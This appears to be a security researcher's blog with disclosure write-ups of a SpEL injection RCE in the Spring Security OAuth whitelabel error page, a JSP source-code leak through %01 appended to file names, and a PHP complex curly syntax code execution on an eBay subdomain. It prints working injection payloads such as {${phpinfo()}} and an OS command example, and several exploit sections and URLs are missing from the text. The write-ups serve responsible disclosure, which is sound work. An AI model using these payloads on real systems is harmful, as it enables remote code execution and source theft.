This led to an error which showed the Whitelabel Error Page. Surprisingly there are lots of well-known websites which still use the Whitelabel Error Page instead of having configured a custom error page. The Spring Security OAuth example shows the Whitelabel Error Page by default whenever an error occurs. The Whitelabel View reflects parts of the given parameter values, which leads to XSS at first glance. After finding the XSS during blackbox testing I reviewed the source code to identify the vulnerable code before I report the issue to upstream. While reviewing the source code I realised that there is a more dangerous issue there.

Error handling calls "SpelView" endpoint

Let's review the source code of

/* Lines 137-148 of: */
        private final SpelView defaultErrorView = new SpelView("Whitelabel Error Page"+ "This application has no explicit mapping for /error, so you are seeing this as a fallback."+ "${timestamp}"+ "There was an unexpected error (type=${error}, status=${status})."+ "${message}");
        @Bean(name = "error")
        @ConditionalOnMissingBean(name = "error")
        public View defaultErrorView() {
                return this.defaultErrorView;}

The user supplied values are passed to the Class which is using the SpelExpressionParser of oauth2/src/main/java/org/springframework/security/oauth2/provider/endpoint/

Source code: /spring-security-oauth2/src/main/java/org/springframework/security/oauth2/provider/endpoint/
        import org.springframework.expression.spel.standard.SpelExpressionParser;
        private final SpelExpressionParser parser = new SpelExpressionParser();
        private final StandardEvaluationContext context = new StandardEvaluationContext();
        this.helper = new PropertyPlaceholderHelper("${", "}");
        Expression expression = parser.parseExpression(name); ...

This is interesting. The Spring Expression Language (click here for detail) is the syntax used by spring for configuration and code place in annotations. To check if the param is also prone to Spring Expression Language Injection I then passed:


The response message shows "666" which means that the proof of concept code has been evaluated!

Exploiting the RCE (on Linux)


Exploiting the RCE (on Windows,null_ref)


The hotfix

The maintainer released a hotfix:

Race condition in the hotfix may be exploitable

If one reviews the applied bug fix one may conclude that the fix looks some kind of a partial fix. They try to prevent recursive placeholders in whitelabel views by using the class in order to replace the "{" prefix.

    /* Source code: "": */
        public SpelView(String template) {
            this.template = template;
            this.prefix = new RandomValueStringGenerator().generate() + "{";
            this.context.addPropertyAccessor(new MapAccessor());
            this.resolver = new PlaceholderResolver() {
              public String resolvePlaceholder(String name) {
                    Expression expression = parser.parseExpression(name);
                Object value = expression.getValue(context);
                  return value == null ? null : value.toString();
            String maskedTemplate = template.replace("${", prefix);
            PropertyPlaceholderHelper helper =
            new PropertyPlaceholderHelper(prefix, "}");
            String result = helper.replacePlaceholders(maskedTemplate, resolver);
            result = result.replace(prefix, "${");
This looks like a quick win solution, but if an attacker makes a sufficient amount of requests the RCE could still be exploitable due to a race condition since the RandomValueStringGenerator (click here for API docs) Class generates a string with the default length (6).

Whitelabel Error Page on production environment

As web developer or web admin you should consider disabling the whitelabel error page or use a custom error page with a generic text. Please refer to Point < code>77.2 Customize the whitelabel error page on


Feb,  8th 2016: vulnerability discovered and reported to upstream
        Feb, 14th 2016: upstream verified the issue
        Mar, 12th 2016: upstream deployed a hotfix
        Jul,  5th 2016: initial vulnerability report published by upstream
        Oct, 13th 2016: this write-up has been published

A tale of an interesting source code leak

Mar, 27th 2016


Lately, while participating in Bug Bounty Programs, I came across an interesting issue which was classified with the highest severity yielding a potential bug bounty. Due to it's terms, i am compelled not to disclose the name of the company.

Information gathering

I started with some information gathering and footprinting. I noticed that the files ends with the ".jsp" extension which often runs with Apache Tomcat. First I reviewed the http response header in order to gain some information about the target system:

HTTP/1.1 200 OK
        Date: 16 Mar 2016 15:15:33 GMT

If the http status code is followed by the date response header in the second line it usually means that it the page is using an Apache httpd as web server. In this case I assumed that an httpd is used in front of an Tomcat web server. If i am right then they could probably be using some module to dispatch the files between the httpd and the Tomcat web server which means I could potentially trick the routing to expose the source code of any ".jsp" or ".inc" files by appending specific lower ascii characters - depending on whether they are using a Connector or Handler.

Connector, Handler, File Descriptor

1) The Apache Tomcat Connectors: If Apache httpd and Tomcat are configured to serve content from the same filing system location then care must be taken to ensure that httpd is not able to serve inappropriate content such as the contents of the WEB-INF directory or JSP source code. This could occur if the httpd DocumentRoot overlaps with a Tomcat Host's appBase or the docBase of any Context. It could also occur when using the httpd Alias directive with a Tomcat Host's appBase or the docBase of any Context.

2) Well, let's have a look on the Apache web server handler. A "handler" is an internal Apache representation of the action to be performed when a file is called. Generally, files have implicit handlers, based on the file type. Normally, all files are simply served by the server, but certain file types are "handled" separately. If you want to handle ".jsp" files you may for example use the Apache module "mod_mime" in order to associate the requested filename's extensions with the file's behavior (handlers and filters) and content (mime-type, language, character set and encoding).

What will the httpd do if you try to access file which is not explicitly associated with a handler or filter? Httpd will serve the file as plain text without further actions which means that we can potentially exploit this behaviour.


In the case of my research of this particular target system i knew from the information gathering analysis that they were handling ".jsp" files, so i assumed that they are using an Apache httpd in the front and an Tomcat or similar web server in the back end of the architecture. So i tried to append some character to the file extension like this in order to get some information by forcing the system to run in some uncaught exceptions and show up with any anormally behaviour:
This, however did not work as expected. I was expecting the system to expose a stack trace or to run into a web application firewall, but instead if came it up with the following message:
        Problem accessing /password.jsp%00. Reason:
            The request contains an illegal URL
From several pentests I performed in the past i knew that the apache httpd would usually strip the %00 and raise a message like this one:
Not Found
        The requested URL /password.jsp was not found on this server.
Therefore I assumed that the error message is not originated by the httpd but from a connector. From past pentests I know that there were some connectors which led to unusual behaviour when passing lower ascii characters to them.

During my research related to Tomcat connectors I found that i may manipulate the routing of the data stream by using the SOH (start of header, 0x01) transmission control sequence. The start of heading (SOH) character was to mark a non-data section of a data stream which is the part of a stream containing addresses and other housekeeping data.

As i have been successful with this trick in past with several modules such as mod_proxy_ajp, mod_jk, some spring boot implementations and a few other i tried:

What I assumed

In this case I assumed the target system had following implementation in place:
1) Send request to Apache httpd
        2) httpd uses it's file handler/filter to pass the request to Tomcat for processing
        3) Tomcat uses it's file handler to open the".jsp" file because it handles
        the %01 as the start of a new header and not as part of the file extension
        4) Tomcat passes the content of the requested file to the httpd
        which now has the content of the ".jsp" file with the requested extension ".jsp%01".
        5) httpd does not find the ".jsp%01" extension in it's file
        handler's extension list and therefore decides to serve the file as plain text
        6) The same also works for ".inc" files on the target system

PoC and reporting

I would potentially gain access to the whole source code but decided to access a few ".jsp" and ".inc" files as a proof of concept. I then immediatly reported this issue to the company and within 3 hours they gave me feedback that they verified the issue and triaged it with the highest severity. They then deployed a hotfix within 48 hours. Respect!

Web server handler/filter/modules with similar issues in the past:
CVE-2007-1860: mod_jk double-decoding:
        IBM Websphere:
        Netscape Web Server:
        Allaire JRun Root directory disclosure:
        Apache httpd artificially Long Slash Path Directory Listing Vulnerability:[1-4096 slashes here]/admin/*
        BEA WebLogic Directory Traversal with %00, %2e, %2f and %5c:

My advisories and CVEs

Mar, 15th 2017


Some of you reached out to me and asked me for my CVEs. Here is a list of some of my security advisories and associated CVE numbers sorted by vulnerability type.

CVE-2016-4977 Remote Code Execution
                     CVE-2016-3109                                          Remote Code Execution                    
CVE-2011-0635 Remote Code Execution
                     CVE-2006-7055                                    Remote Code Execution                 
CVE-2006-5132 Remote Code Execution
                     CVE-2006-3793                                    Remote Code Execution                 
CVE-2006-3210 Remote Code Execution
                     CVE-2006-2881                                    Remote Code Execution                 
CVE-2006-2852 Remote Code Execution
                     CVE-2006-2681                                    Remote Code Execution                 
CVE-2006-2323 Remote Code Execution
CVE-2010-2339 SQL Injection
CVE-2008-6120 SQL Injection
CVE-2006-3770 SQL Injection
CVE-2006-5128 SQL Injection
CVE-2006-5132 SQL Injectionn
CVE-2006-3793 SQL Injection
CVE-2006-3210 SQL Injection
CVE-2006-5935 SQL Injection
CVE-2006-5798 SQL Injection
CVE-2006-7077 SQL Injection RCE using CCS

Dec, 13th 2013


Once again i have been hunting security issues on ebay's web sites. This time I've identified a controller which was prone to remote code execution due to a type cast issue in combination with complex curly syntax. Since this techniques are less known and less discussed I found it interesting enough to blog about it. The vulnerable sub domain id the same where I've identified an exploitable SQL injection last year, which is located on .

Information gathering

A legit user request looked like:

One of the very first tests I perform against php web applications is to look for type cast issues because php is known to raise warnings or even errors when the value of a given param is an array rather than being a string which it is expected to be. So obviously my next step was to perform the above request using [] to submit it as an array:[]=Dave&catidd=1

The web application served me the same response as in the prior request which surprised me a bit. From my experience I know that php has several ways to handle strings. For example if the string is enclosed in double-quotes, the php parser will allow code evaluation if some circumstances are given.

PHP complex syntax

Well, if we use php's complex curly syntax we could possibly have some success. Never heard of complex syntax?

Let's give it a try:{${phpinfo()}}&catidd=1

PHP code evaluation circumstances

This had no success. So let's rethink which circumstances may lead to code evaluation in php.

Which of these is ebay using?

Since it's been a blackbox test I assumed that eBay was using preg_replace() for filtering bad words in combination with the eval() method afterwords because of 2 observations i made:
1) they were using a spellchecker. I have seen a bunch of spellchecker in web apps working with eval() method in the past
2) they are using some filter which I guess to be a blacklist of words that are being replaced with the preg_replace() method.

Blackbox analysis

For example when I submitted my handle 'secalert' it was stripped and as a result it returned 'sec' in the response of the search query. So obviously they are filtering words like 'alert' from the user supplied string, maybe in hope to prevent XSS, which is a very bad idea! It didn't work. Okay, seems like they are not using user-supplied values within double-quotes. So what can we do now?

PHP's internal string handling

How does php internally handle strings?

PHP complex syntax + http parameter pollution + array indexing

So let's try to submit an array rather than a string and try to echo the values of the param 'q' by accessing the array indices.[0]=Dave&q[1]=secalert&catidd=1

It works. The search controller parsed that request and I got the last instance as part of the result, in this particular case it returned valid entries which matched to the keyword 'sec'.

My assumption

But why? As mentioned prior I was assuming that eBay is using preg_replace() for filtering bad words and afterwards doing some eval() stuff with that return values. So what happens here could be that they are trying to enforce that user supplied values are always of the type string. That means if it's not a string they try to make a string out of it, i.e. they try to cast the values of the array into a string before doing the string comparison for the list containing bad words.

Exploiting the RCE

Okay, good. But how can we exploit that? We will put all this stuff together and submit an array with 2 indices containing arbitrary values, one of them will be supplied in complex curly syntax to trick the parser.[0]=Dave&q[1]=secalert{${phpinfo()}}&catidd=1
Success! Now let's verify this by submitting two more requests.[0]=Dave&q[1]=secalert{${phpcredits()}}&catidd=1[0]=Dave&q[1]=secalert{${ini_get_all()}}&catidd=1

Verified! We can evaluate arbitrary php code in context of the ebay website.

From my point of view that was enough to prove the existence of this vulnerabilty to ebay security team and I don't wanted to cause any harm. What could an evil hacker have done? He could for example investigate further and also try things like {${`ls -al`}} or other OS commands and would have managed to compromise the whole webserver.



December,  6th 2013: vulnerability discovered and reported to ebay
        December,  9th 2013: ebay solved the issue and deployed a hotfix
        December, 13th 2013: this write-up has been published


David Kurz
Zeppelinstrasse 3
13583 Berlin


Automatisierte Datenerhebung: Bereits beim bloßen Besuch dieses Blogs übermittelt Ihr Internetbrowser bzw. Ihr Mobilgerät aus technischen Gründen regelmäßig automatisch nicht-personenbezogene Daten, die wir in einer Protokolldatei speichern. Dazu gehören:

  • - Browsertyp/ -version bzw. Typ und Version des Mobilgeräts
  • - verwendetes Betriebssystem
  • - Referrer URL (die zuvor besuchte Seite)
  • - öffentliche IP-Adresse des zugreifenden Rechners
  • - übertragene Datenmenge
  • - Inhalt der Anforderung (konkrete Seite)
  • - Zugriffsstatus/HTTP-Statuscode
  • - Uhrzeit der Serveranfrage
  • - ggf. Version der App
  • Diese Daten werden ausschließlich zu statistischen Zwecken sowie zur Verbesserung des Angebotes für den Nutzer des Blogs erhoben. Eine Verknüpfung dieser Daten mit Daten, die Sie persönlich identifizierbar machen, erfolgt nicht, es sei denn, dies ist zu Beweiszwecken zwingend erforderlich.
    DIese Webseite setzt Cookies. Darueber hinaus werden 3rd PArty Cookies von Youtube gesetzt. Betreibergesellschaft von YouTube ist die YouTube, LLC, 901 Cherry Ave., San Bruno, CA 94066, USA. Die YouTube, LLC ist einer Tochtergesellschaft der Google Inc., 1600 Amphitheatre Pkwy, Mountain View, CA 94043-1351, USA. Weitere Informationen zu YouTube können unter abgerufen werden. Die von YouTube veröffentlichten Datenschutzbestimmungen, die unter abrufbar sind, geben Aufschluss über die Erhebung, Verarbeitung und Nutzung personenbezogener Daten durch YouTube und Google.